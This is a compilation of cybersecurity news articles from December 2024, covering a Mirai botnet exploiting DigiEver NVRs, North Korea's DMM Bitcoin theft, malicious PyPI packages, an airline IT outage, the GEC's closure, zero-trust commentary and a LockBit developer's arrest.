A new Mirai-based botnetis actively exploiting a remote code execution vulnerability that has not received a tracker number and appears to be unpatched in DigiEver DS-2105 Pro NVRs.

The campaign started in October and targets multiple network video recorders and TP-Link routers with outdated firmware.

One of the vulnerabilities used in the campaign was documented by TXOne researcher Ta-Lun Yen and presented last year at the DefCamp security conference in Bucharest, Romania. The researcher said at the time that the issue affects multiple DVR devices.

Akamai researchers observed that the botnet started to exploit the flaw in mid-November, but found evidence that the campaign has been active since at least September.

Apart from the DigiEver flaw, the new Mirai malware variant also targets CVE-2023-1389 on TP-Link devices and CVE-2018-17532 on Teltonika RUT9XX routers.

Attacks on DigiEver NVRs

The vulnerability exploited to compromise DigiEver NVRs is a remote code execution (RCE) flaw and the hackers are targeting the ‘/cgi-bin/cgi_main. cgi’ URI, which improperly validates user inputs.

This allows remote unauthenticated attackers to inject commands like ‘curl’ and ‘chmod’ via certain parameters, such as the ntp field in HTTP POST requests.

Akamai says that the attacks it has seen by this Mirai-based botnet appear similar to what is described in Ta-Lun Yen’s presentation.

Through command injection, the attackers fetch the malware binary from an external server and enlist the device into its botnet. Persistence is achieved by adding cron jobs.

Once the device is compromised, it is then used to conduct distributed denial of service (DDoS) attacks or to spread to other devices by leveraging exploit sets and credential lists.

Akamai says the new Mirai variant is notable for its use of XOR and ChaCha20 encryption and its targeting of a broad range of system architectures, including x86, ARM, and MIPS.

“Although employing complex decryption methods isn’t new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators,” comments Akamai.

“This is mostly notable because many Mirai-based botnets still depend on the original string obfuscation logic from recycled code that was included in the original Mirai malware source code release,” the researchers say.

The researchers note that the botnet also exploits CVE-2018-17532, a vulnerability in Teltonika RUT9XX routers as well as CVE-2023-1389, which impacts TP-Link devices.

Indicators of compromise (IoC) associated with the campaign are available at the end of Akamai’s report, along with Yara rules for detecting and blocking the threat.

Dec 24, 2024Ravie LakshmananCybercrime / Malware

Japanese and U.S. authorities have formerly attributed the theft of cryptocurrency worth $308 million from cryptocurrency company DMM Bitcoin in May 2024 to North Korean cyber actors.

“The theft is affiliated with TraderTraitor threat activity, which is also tracked as Jade Sleet, UNC4899, and Slow Pisces,” the agencies said. “TraderTraitor activity is often characterized by targeted social engineering directed at multiple employees of the same company simultaneously.”

The alert comes courtesy of the U.S. Federal Bureau of Investigation (FBI), the Department of Defense Cyber Crime Center, and the National Police Agency of Japan. It’s worth noting that DMM Bitcoin shut down its operations earlier this month in the aftermath of the hack.

TraderTraitor refers to a North Korea-linked persistent threat activity cluster that has a history of targeting companies in the Web3 sector, luring victims into downloading malware-laced cryptocurrency apps and ultimately facilitating theft. It’s known to be active since at least 2020.

In recent years, the hacking crew has orchestrated a series of attacks that leverage job-themed social engineering campaigns or reaching out to prospective targets under the pretext of collaborating on a GitHub project, which then leads to the deployment of malicious npm packages.

The group, however, is perhaps best known for infiltrating and gaining unauthorized access to JumpCloud’s systems to target a small set of downstream customers last year.

The attack chain documented by the FBI is no different in that the threat actors contacted an employee at a Japan-based cryptocurrency wallet software company named Ginco in March 2024, posing as a recruiter and sending them a URL to a malicious Python script hosted on GitHub as part of a supposed pre-employment test.

The victim, who had access to Ginco’s wallet management system, was subsequently compromised after they copied the Python code to their personal GitHub page.

The adversary moved to the next-phase of the attack in mid-May 2024 when it exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system.

“In late-May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack,” the agencies said. “The stolen funds ultimately moved to TraderTraitor-controlled wallets.”

The disclosure comes shortly after Chainalysis attributed the hack of DMM Bitcoin to North Korean threat actors, stating the attackers targeted vulnerabilities in infrastructure to make unauthorized withdrawals.

“The attacker moved millions of dollars’ worth of crypto from DMM Bitcoin to several intermediary addresses before eventually reaching a Bitcoin CoinJoin Mixing Service,” the blockchain intelligence firm said.

“After successfully mixing the stolen funds using the Bitcoin CoinJoin Mixing Service, the attackers moved a portion of the funds through a number of bridging services, and finally to HuiOne Guarantee, an online marketplace tied to the Cambodian conglomerate, HuiOne Group, which was previously exposed as a significant player in facilitating cybercrimes.”

The development also comes as the AhnLab Security Intelligence Center (ASEC) revealed that the North Korean threat actor codenamed Andariel, a sub-cluster within the Lazarus Group, is deploying the SmallTiger backdoor as part of attacks targeting South Korean asset management and document centralization solutions.

A technical snafu briefly grounded American Airlines flights across the US on Christmas Eve.

American Airlines tells The Register that the technology issue impacted systems necessary for flight releases. In response, the FAA reports that the airline requested a nationwide stop order, which began around 1150 UTC and lasted about an hour.

In a statement, the US’ largest airline blamed a “vendor technology” issue for the disruption, but didn’t name and shame any specific provider.

“That issue has been resolved and flights have resumed. We sincerely apologize to our customers for the inconvenience this morning. It’s all hands on deck as our team is working diligently to get customers where they need to go as quickly as possible,” an American Airlines spokesperson told The Register in an email.

American Airlines didn’t address El Reg’s questions as to whether resolving the issue could result in additional delays or disruptions over the holiday season.

The airline is encouraging customers to use their mobile app or visit their website for information on how the outage may have affected their flights and connections.

The incident comes amid one of the busiest travel seasons of the year, with the Transportation Security Administration (TSA) expecting to screen nearly 40 million passengers over the peak Christmas and New Year’s travel period.

As technology relayed travel disruptions go, an hour-long grounding is far from the worst. Over the past few years, we’ve seen numerous situations in which IT failures have left millions stranded. Two years ago, an IT meltdown at Southwest Airlines left roughly 2 million travelers stranded as crews were forced to schedule flights manually in what was later described as an “extraordinarily difficult” and “tedious, long process.”

More recently, the now infamous Crowdstrike outage brought much of the IT world to a standstill. It is estimated the flawed update to the Falcon thread-detection system crashed and disabled more than 8 million Microsoft Windows machines around the world. Among them were more than 37,000 systems operated by Delta Airlines. The incident resulted in travel delays for more than 1.3 million people, the airline later revealed. ®

The State Department’s center for fighting global disinformation received a lump of coal in its Christmas stocking this week as congressional lawmakers excluded new funding and authorization for the office beyond this year.

The Global Engagement Center, which tracks foreign disinformation, will lose  its authority on Dec. 24. Despite a concerted push by State officials to lobby Congress for an extension, a measure to extend the center’s authority into 2031 was stripped out of the final version of defense authorization legislation that passed through the Senate.

“The Global Engagement Center will terminate by operation of law [by the end of the day] on December 23, 2024,” a State Department spokesperson told CyberScoop in an email. “The Department of State has consulted with Congress regarding next steps.”

According to figures provided by State, the GEC has a staff of approximately 120 and an annual budget of $61 million. The spokesperson did not address questions about what will happen to the center’s personnel and technology following the closure.

The shuttering will leave the State Department without a dedicated office for countering disinformation abroad for the first time since 2016. The closure comes at the end of a year when U.S. officials, foreign political leaders and private companies tracking disinformation have alleged that Russia and China have engaged in concerted propaganda campaigns targeting democratic elections in Taiwan, Moldova, Georgia, Romania and other countries.

“This is extremely frustrating,” Mark Montgomery, former executive director of the Cyberspace Solarium and a supporter of extending the center’s authority, told CyberScoop. “On a bipartisan basis, both political parties know that Russia, China and, to a lesser degree, Iran and other non-state actors, conduct information operations against us spreading lies, and the GEC was a good tool for ensuring that the truth, as we see it, came out.”

While the center does not focus on disinformation targeting the United States, its work with related organizations faced  criticism from congressional Republicans and Elon Musk, who accused the center in 2023 of being “the worst offender in U.S. government censorship [and] media manipulation.”

Musk is now an adviser  to President-elect Donald Trump and was placed in charge of an advisory board for cutting programs and reducing government spending.

Additionally, Republicans on the Hill raised questions about the GEC’s value, suggesting its work might duplicate existing analysis from  the private sector and other parts of government.

In interviews with CyberScoop and FedScoop last month, GEC leaders pushed back on those views, calling their work “critical” to combatting foreign propaganda campaigns in allied countries and emphasizing that they take active steps to exclude data on U.S. persons from their analysis.

“We are really the first analytical unit in the U.S. government that takes this kind of comprehensive approach of looking at threat actors — Iranians, [China], the Russians — and try to understand … what their influence is broadly on the information space in different geographic regions,” said Carrie Goux, GEC’s acting deputy coordinator.

Lindsay Gorman, a former White House official under the Biden administration, told CyberScoop that there is “a lack of recognition in Congress that the wars democracies are fighting with autocrats overseas are no longer only in the physical domain, but in the cyberspace realm of 1s and 0s.”

“Whether their goal is to marshal support for invading neighbors or undermine U.S. credibility overseas, the U.S. needs a means to fight back. One way is to expose covert campaigns for what they are — important work the GEC is doing,” said Gorman, now at the nonprofit German Marshall Fund. “GEC has been the eyes and ears on the ground when it comes to information threats overseas, tracking where autocratic strategic objectives lie and how tactics are evolving to guide responses.”

Gorman stressed that Russian and Chinese disinformation campaigns “aren’t going away” and are increasingly leveraging social media and emerging technologies like generative AI “to sow discord and undermine democracy around the world.”

GEC officials also said their limited budget  has hindered efforts to acquire advanced technology needed to support their work, including tools to detect AI-manipulated media. 

State Department documents obtained by FedScoop detail a range of solutions and tools the center hoped to acquire if it was reauthorized, including a system for detecting photoshopped images, a “meme detection” model to help analyze and contextualize imagery, a detector for imagery created through Stable Diffusion, and a tool to detect AI-generated assets in video.

Montgomery said that with Republicans set to take control of the State Department and both houses of Congress next month, they are positioned to shape the GEC’s mission and operations to address any concerns about impinging on domestic U.S. issues.

“The frustration is, why not give it an extension now that you’re basically responsible?” Montgomery asked. 

COMMENTARY

Despite never-ending data breaches and ransomware attacks, too many companies still rely on the outdated “trust but verify” cybersecurity strategy. This approach assumes that any user or device inside a company’s network can be trusted once it has been verified. The approach has clear weaknesses: Many businesses are putting themselves at additional risk by verifying once, then trusting forever.

There was a time when trust but verify made sense, namely when networks were self-contained and well-defined. But at some point, perhaps due to the overwhelming volume of devices on a network, the number of patches needing to be applied, user demands, and resource constraints in the cybersecurity team, things began to slip. Initial verification meant the asset was trusted, but no additional verification ever took place.

The User Example of Trust Without Ongoing Verification

It’s easy to see how this happens with users. A user typically goes through a background check when they join the company, but once onboarded, despite any number of changes in their lives that could affect their trustworthiness, we allow them to access our systems and data without further verification. 

In the majority of cases, the absence of further verification does not cause damage. However, if the user decides to act against the best interest of their employer, the results can be catastrophic. The more sensitive the information the individual has access to, the greater the risk. This is why individuals with security clearances are regularly re-vetted, and security personnel may conduct regular finance checks to identify any issues early and intervene to mitigate possible damage.

In organizations that follow a trust-but-verify approach, two personas stand out: those that have considered the risk of one-time asset verification acceptable; and — the minority — those that try to manage the risk with a re-verification program. A shift in persona from the former to the latter usually only occurs after a breach, a crisis in availability, or another “career limiting disaster.”

The reality is that there are simply not enough hours in the day for security practitioners to do all of the things that must be done. Have security patches been correctly applied to all vulnerable devices? Are all third-party security assessments properly analyzed? Do all Internet of Things (IoT) devices really belong on the network? Are managed security services performing as expected? 

Compromising one of these trusted devices means being granted trust to move laterally across the network, accessing sensitive data and critical systems. Organizations likely will not know the extent of their exposure until something goes wrong. 

The Costly Consequences of Insufficient Verification

When these breaches are eventually discovered, the costs begin to mount. Companies face not only the direct costs of incident response, but potentially also regulatory fines, class-action lawsuits, lost customers, and lasting damage to their brand reputation. Relatively small incidents can cost millions of dollars, while large incidents regularly cost billions.

In addition to these direct costs, insufficient verification also leads to more frequent and expensive compliance audits. Regulators and industry bodies are increasingly demanding that companies demonstrate robust identity and access management controls, for example under the European Union’s upcoming Digital Operational Resilience Act (DORA), as well as continuous monitoring and validation of user and device activity. Certifications and accreditations can no longer be accepted at face value. 

The Path Forward: Adopt a Zero-Trust Approach

Instead of trusting after verification, businesses should instead allow only what the business needs, for as long as it needs it. Never trust, always verify. This is how a zero-trust architecture operates.

Every user, device, and application that attempts to make a connection, regardless of its location, is scrutinized and validated, dramatically limiting the potential damage from a successful compromise. A zero-trust architecture replaces firewalls and VPNs, so there are fewer devices to maintain, and a reduced attack surface means fewer opportunities for attackers to gain a foothold.

Zero trust doesn’t mean zero testing; testing should form an integral part of any IT and cybersecurity strategy. However, it does mean the likelihood of a major failure stemming from trust being extended to users, devices, or applications that do not deserve it, is a thing of the past. 

The North Korean hacker group ‘TraderTraitor’ stole $308 million worth of cryptocurrency in the attack on the Japanese exchange DMM Bitcoin in May.

In a short post, the FBI attributed the attack to the state-affiliated threat actor TraderTraitor, also tracked as Jade Sleet, UNC4899, and Slow Pisces.

The crypto heist occurred in May 2024 and forced the platform to restrict account registration, cryptocurrency withdrawals, and trading until the completion of the investigations.

Earlier this week, a report from blockchain intelligence firm Chainalysis attributed the attack to North Korean threat actors but did not share any specific details.

Attack chain

In a short announcement, the FBI says that TraderTraitor’s attack on DMM Bitcoin started in late March 2024, when one of the attackers pretended to be a legitimate recruiter on LinkedIn and approached an employee of Ginco, a Japanese enterprise cryptocurrency wallet software company.

The hacker sent the Ginco employee, who had access to his employer’s wallet management system, a job proposal involving a pre-employment test on GitHub. This tactic has been popular with North Korean threat groups this year [1, 2].

The victim received a piece of malicious Python code to copy to their personal GitHub page in order to carry out the conduct the test. The code, however, compromised the computer and allowed TraderTraitor to infiltrate Ginco and then move laterally to DMM.

“After mid-May 2024, TraderTraitor actors exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system,” explains the FBI.

“In late May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack,” the agency says.

U.S. authorities have been monitoring the activity of TraderTraitor since 2022 when the threat actor started to target the blockchain space with fake apps.

In 2023, GitHub warned of a social engineering campaign conducted by the particular threat actors on the platform, targeting the accounts of developers in the blockchain, cryptocurrency, online gambling, and cybersecurity sectors.

Later, the FBI warned that TraderTraitor was preparing to cash out 1,580 Bitcoin (valued at the time at around $41 million) stolen from various sources that year.

Dec 24, 2024Ravie LakshmananMalware / Data Exfiltration

Cybersecurity researchers have flagged two malicious packages that were uploaded to the Python Package Index (PyPI) repository and came fitted with capabilities to exfiltrate sensitive information from compromised hosts, according to new findings from Fortinet FortiGuard Labs.

The packages, named zebo and cometlogger, attracted 118 and 164 downloads each, prior to them being taken down. According to ClickPy statistics, a majority of these downloads came from the United States, China, Russia, and India.

Zebo is a “typical example of malware, with functions designed for surveillance, data exfiltration, and unauthorized control,” security researcher Jenna Wang said, adding cometlogger “also shows signs of malicious behavior, including dynamic file manipulation, webhook injection, stealing information, and anti-[virtual machine] checks.”

The first of the two packages, zebo, uses obfuscation techniques, such as hex-encoded strings, to conceal the URL of the command-and-control (C2) server it communicates with over HTTP requests.

It also packs in a slew of features to harvest data, including leveraging the pynput library to capture keystrokes and ImageGrab to periodically grab screenshots every hour and save them to a local folder, prior to uploading them to the free image hosting service ImgBB using an API key retrieved from the C2 server.

In addition to exfiltrating sensitive data, the malware sets up persistence on the machine by creating a batch script that launches the Python code and adds it to the Windows Startup folder so that it’s automatically executed upon every reboot.

Cometlogger, on the other hand, is a lot of feature-packed, siphoning a wide range of information, including cookies, passwords, tokens, and account-related data from apps such as Discord, Steam, Instagram, X, TikTok, Reddit, Twitch, Spotify, and Roblox.

It’s also capable of harvesting system metadata, network and Wi-Fi information, a list of running processes, and clipboard content. Furthermore, it incorporates checks to avoid running in virtualized environments and terminates web browser-related processes to ensure unrestricted file access.

“By asynchronously executing tasks, the script maximizes efficiency, stealing large amounts of data in a short time,” Wang said.

“While some features could be part of a legitimate tool, the lack of transparency and suspicious functionality make it unsafe to execute. Always scrutinize code before running it and avoid interacting with scripts from unverified sources.”

Opinion One of the charms of coding is that malice can be indistinguishable from incompetence. Last week’s Who, Me? story about financial transfer test software running amok is a case in point.

The hapless dev left code running overnight that should have moved a single cent in and out of his test account. Instead, it machine-gunned $100 transfers in for hours. It tripped internal security but the temporarily rich kid had told his boss about it and could thus talk his way clear.

What if the bank-raiding routine hadn’t been detected? Our hero would have come in to find a huge cash stash sitting there, a highly tempting proof of concept perhaps. Not coming clean would be malicious, but the code’s the same whether he ‘fessed up or not.

This is exactly the quandary US authorities are pondering as they consider banning products by Chinese consumer networking company TP-Link. These are very popular because the hardware is good and reliable, but mostly because they are remarkably cheap. So cheap, in fact, that the company is suspected of dumping, selling at under cost to take market share. The main reason for suspicion, though, is the routers’ firmware. It’s outstandingly prone to vulnerabilities, ridden with things like buffer overflows, to the point that mere incompetence seems an insufficient explanation.

This sounds like a conspiracy theory because the evidence is ambiguous. Line up the circumstantial evidence and it’s at least plausible. If TP-Link does have a corporate fondness for crap coders, how come the features visible to owners in everyday use work well, while invisible vulnerabilities are so common? Chinese law compels all domestic companies to cooperate with state security in secret. There is already evidence of widespread Chinese infiltration of communication infrastructure with Salt Typhoon. Motive, opportunity, ability, and history: where does the balance of probabilities lie?

It would be possible to prove TP-Link products were uniquely vulnerable by statistical analysis, comparing them to competitive products from other vendors. At that point, it doesn’t really matter what the reason is, they could be taken off the market because of consumer safety worries. That wouldn’t do much good, given the huge installed base, and the uniquely attractive environment infrastructure offers to the bad guys. It’s invisible to end users, hard to monitor, hard to update, and once something’s installed and working, it is highly disruptive to rip it out.

A great/awful example of this is the recently disclosed Iranian-linked attack on US and Israeli energy and IoT devices, part of a family of attacks that have targeted a wide range of devices from a wide range of manufacturers. Whoever created the IOCONTROL malware is highly competent and inventive, but at first glance it seems unlikely that the firmware of the target devices would contain deliberately vulnerable Iranian-sourced code. Iran has no international IT infrastructure makers to manipulate, being locked away behind sanctions. This need not stop it. Nor anyone else.

Industrial espionage is exceptionally hard to spot until the stolen secrets come to light. Likewise, industrial sabotage can be equally hard to trace. When that industry is firmware, and the malicious actor has no intention of using the information in detectable ways, this is even more so. Given how valuable zero days are to attackers, how much easier would they be to exploit if you put them there yourself?

You don’t even need to embed a star player in your target company, just someone competent enough to send copies of the code under development back to the malware creators, and get their changes back into the tree.

Do all those IoT, industrial control, and router companies have the ability to spot highly disguised vulnerabilities slipped in by malicious experts? They’re not very good at spotting incompetent errors, given the many alerts the industry generates.

Catching corrupt coders is always going to be hard, unless their own opsec is bad. It’s also most embarrassing to go public when you do. Even in security services and the military, where employees are routinely screened and counter-espionage is a specialty, the job is still very difficult. It’s not as if ideology or animus are needed to tempt someone into sin: cash and flattery do the job just as well.

It’s not a case of whether this is happening. The opportunities are too great, the risk too small, and the outlays too modest to resist. The question is how to find it, given that nobody seems to be looking. A company responsible for a vulnerability has the responsibility to fix it, but not to track down how it came to be and who was involved. There is no agency tracking and correlating this information, not unless national security is directly involved.

This just in: it is. We just don’t really believe it. Until we do, there’s an entire industry-wide meta-vulnerability going completely unchecked. Better believe it. ®

China’s national cyber incident response center accused the U.S. government of launching cyberattacks against two Chinese tech companies in a bid to steal trade secrets.

In a notice Wednesday, the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT) said a suspected U.S. intelligence agency was behind the attacks, and that CNCERT had “handled” them, according to a Google translation.

The U.S. government has long accused China of cyber espionage to steal trade secrets from domestic companies, and China’s allegations about U.S. cyberattacks arrives in the midst of a very public campaign from U.S. government officials blaming China for a major attack on telecommunications carriers.

CNCERT said one of the attacks dates back to August of this year, against “a certain advanced material design and research unit.” The suspected attackers exploited a vulnerability in a document management system to infiltrate the software upgrade management server the company used, then install Trojans in more than 270 hosts of the company, CNCERT said.

The other attack dates to May of last year, against a “large-scale high-tech enterprise” in China’s “smart energy and digital information industry,” according to CNCERT. The center’s analysis determined that the attackers exploited Microsoft Exchange vulnerabilities to get into the company’s mail server, then implanted backdoors and took control of devices at the company and its subsidiaries.

China has, in recent years, stepped up its charges about U.S. cyberattacks. The report did not name a specific U.S. government office or entity responsible for the attacks.

The Chinese Communist Party-owned newspaper China Daily published an infographic this year detailing allegations that the United States is the leading source of cyberattacks against China over the past five years, citing CNCERT in part.

Republican lawmakers, as well as a top official in the incoming second Trump administration, have said recently in response to the Salt Typhoon telecommunications breaches that the United States has been too timid about going on offense against China.

CNCERT describes itself as a non-governmental non-profit cybersecurity technical center. China Daily said it is led by the Ministry of Industry and Information Technology.

Spokespeople for the National Security Agency and U.S. Cyber Command did not immediately respond to requests for comment Thursday.

NEWS BRIEF

A newly unsealed criminal complaint by US law enforcement shows they have been working to dismantle the LockBit ransomware-as-a-service group for several years, including a previously undisclosed arrest of one of the operation’s lead developers in Israel last August.

Rostislav Panev, a 51-year-old with dual Russian-Israeli citizenship, is facing extradition to the US to face charges along with two others accused of similarly working for LockBit, not just to develop the ransomware itself but also tools used by affiliates. For his part, Panev is accused of working on LockBit ransomware from its beginnings in 2019, eventually creating one of the most prolific ransomware operations in the world, according to the Justice Department’s statement about the arrest.

Panev, according to the Justice Department, at the time of his arrest had admin credentials for LockBit’s Dark Web online repository with the ransomware’s source code, as well as the source code for an affiliate tool called “StealBit” used to exfiltrate stolen data. His laptop also had he access credentials for the LockBit control panel used by affiliates. The Justice Department’s statement adds that Panev confessed to his role in the LockBit ransomware operation.

“The Justice Department’s work going after the world’s most dangerous ransomware schemes includes not only dismantling networks, but also finding and bringing to justice the individuals responsible for building and running them,” Attorney General Merrick Garland said in a statement about the arrests. “Three of the individuals who we allege are responsible for LockBit’s cyberattacks against thousands of victims are now in custody, and we will continue to work alongside our partners to hold accountable all those who lead and enable ransomware attacks.”